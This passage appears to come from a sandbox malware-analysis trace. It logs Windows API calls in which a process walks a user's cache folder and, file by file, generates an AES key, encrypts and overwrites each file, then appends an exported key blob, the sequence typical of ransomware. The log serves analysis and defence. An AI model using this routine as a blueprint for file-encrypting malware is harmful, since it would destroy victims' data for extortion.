hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0146.777] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x182, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x190) returned 1 [0146.777] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.777] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x190, lpOverlapped=0x0) returned 1 [0146.777] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0146.777] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.777] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.777] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0146.777] CloseHandle (hObject=0x198) returned 1 [0146.796] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.801] CryptDestroyKey (hKey=0x3b8690) returned 1 [0146.801] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.801] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0146.801] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0146.801] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", dwFileAttributes=0x80) returned 1 [0146.803] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_f6e15778dc8e326895c606fbfa0392eb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0146.803] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=390) returned 1 [0146.803] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=390) returned 1 [0146.803] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x64, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.803] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0146.804] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.804] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0146.804] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0146.804] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.804] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x186, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x186, lpOverlapped=0x0) returned 1 [0146.804] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0146.804] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x186, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x190) returned 1 [0146.804] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.804] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x190, lpOverlapped=0x0) returned 1 [0146.805] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0146.805] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.805] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.805] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0146.805] CloseHandle (hObject=0x198) returned 1 [0146.825] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.831] CryptDestroyKey (hKey=0x3b8690) returned 1 [0146.831] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.831] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0146.831] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0146.831] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", dwFileAttributes=0x80) returned 1 [0146.832] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\828298824ea5549947c17ddabf6871f5_0206efbc540300c3bf0163cdbc3d7d56"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0146.832] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=384) returned 1 [0146.832] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=384) returned 1 [0146.832] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x5e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.832] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0146.833] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.833] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0146.833] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0146.834] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.834] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x180, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x180, lpOverlapped=0x0) returned 1 [0146.834] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0146.834] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x180, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x190) returned 1 [0146.834] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.834] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x190, lpOverlapped=0x0) returned 1 [0146.834] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0146.834] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.834] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.834] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0146.834] CloseHandle (hObject=0x198) returned 1 [0146.867] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.872] CryptDestroyKey (hKey=0x3b8690) returned 1 [0146.872] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.872] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0146.872] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0146.872] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", dwFileAttributes=0x80) returned 1 [0146.873] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8828f39c7c0ce9a14b25c7eb321181ba_3df94eb797096674f7793a562a778c5f"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0146.873] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=392) returned 1 [0146.873] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=392) returned 1 [0146.873] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x66, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.873] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0146.875] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.875] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0146.875] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0146.875] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.875] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x188, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x188, lpOverlapped=0x0) returned 1 [0146.875] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0146.875] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x188, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x190) returned 1 [0146.875] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.875] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x190, lpOverlapped=0x0) returned 1 [0146.875] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0146.875] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.875] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.876] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0146.876] CloseHandle (hObject=0x198) returned 1 [0146.896] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.900] CryptDestroyKey (hKey=0x3b8690) returned 1 [0146.900] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.901] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0146.901] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0146.901] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", dwFileAttributes=0x80) returned 1 [0146.901] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8828f39c7c0ce9a14b25c7eb321181ba_c6ef73e4482b2588b1252d1a64b99416"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0146.901] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=392) returned 1 [0146.902] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=392) returned 1 [0146.902] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x66, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.902] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0146.902] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.902] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0146.902] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0146.903] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.903] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x188, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x188, lpOverlapped=0x0) returned 1 [0146.903] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0146.903] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x188, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x190) returned 1 [0146.903] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.903] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x190, lpOverlapped=0x0) returned 1 [0146.903] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0146.903] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.903] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.903] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0146.903] CloseHandle (hObject=0x198) returned 1 [0146.920] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.924] CryptDestroyKey (hKey=0x3b8690) returned 1 [0146.924] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.924] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0146.924] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0146.925] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", dwFileAttributes=0x80) returned 1 [0146.926] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8e4e510f44a56b8c8ecfec352907c373_411140098d71f028134e9b8a21255c61"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0146.926] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=406) returned 1 [0146.926] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=406) returned 1 [0146.926] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x74, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.926] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0146.927] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.927] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0146.927] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0146.927] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.927] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x196, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x196, lpOverlapped=0x0) returned 1 [0146.927] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0146.927] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x196, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1a0) returned 1 [0146.927] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.927] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x1a0, lpOverlapped=0x0) returned 1 [0146.927] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0146.927] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.927] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.927] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0146.927] CloseHandle (hObject=0x198) returned 1 [0146.944] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.948] CryptDestroyKey (hKey=0x3b8690) returned 1 [0146.948] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.948] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0146.948] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0146.949] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015", dwFileAttributes=0x80) returned 1 [0146.949] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\5p5nrgjn0js 